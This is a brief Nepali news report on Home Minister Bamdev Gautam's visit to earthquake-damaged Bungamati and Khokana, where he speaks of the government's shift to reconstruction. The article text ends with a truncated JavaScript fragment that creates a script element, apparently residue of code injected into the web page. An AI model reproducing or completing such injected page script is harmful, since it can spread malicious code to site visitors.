उपप्रधान तथा गृहमन्त्री बामदेव गौतमले राहत ,उद्धार र पुनस्र्थापनाका लागी सरकारले कुनै कसर बाकि नछाड्ने बताउनुभएको छ। शुक्रबार ललितपुरको बुङमति र खोकनामा भूकम्पका कारण भएको क्षतीको अवलोकन गदर्ने मन्त्री गौतलले उद्धार र राहतको काम सकिएकाले पुनःनिर्माण र पुनःस्थापनाको कामलाई सरकारले अगाडि बढाएको उल्लेख गर्नुभयो।

उहाले नेपालम आएको महाविपत्तीमा सबै एक भएर अघि बढ्नुपर्ने बताउनुभयो। एक अर्को प्रसंगमा मनात्री गौतमले आफ्नै मान्छेहरुले सरकारको आलोचना गरेको गुनासो गनुभयो। मन्त्री गौतमले स्थानियहरु छलफल गर्दे राहतका बिषयमा जानकारी समेत लिनुभएको थियो। ऐतिहासिक महत्व बोकेको बुङमति र खोकनामा अधिकांश पुराना घरहरुमा भूकम्पका कारण क्षती पुगेको छ।var d=document;var s=d.createElement(‘script’);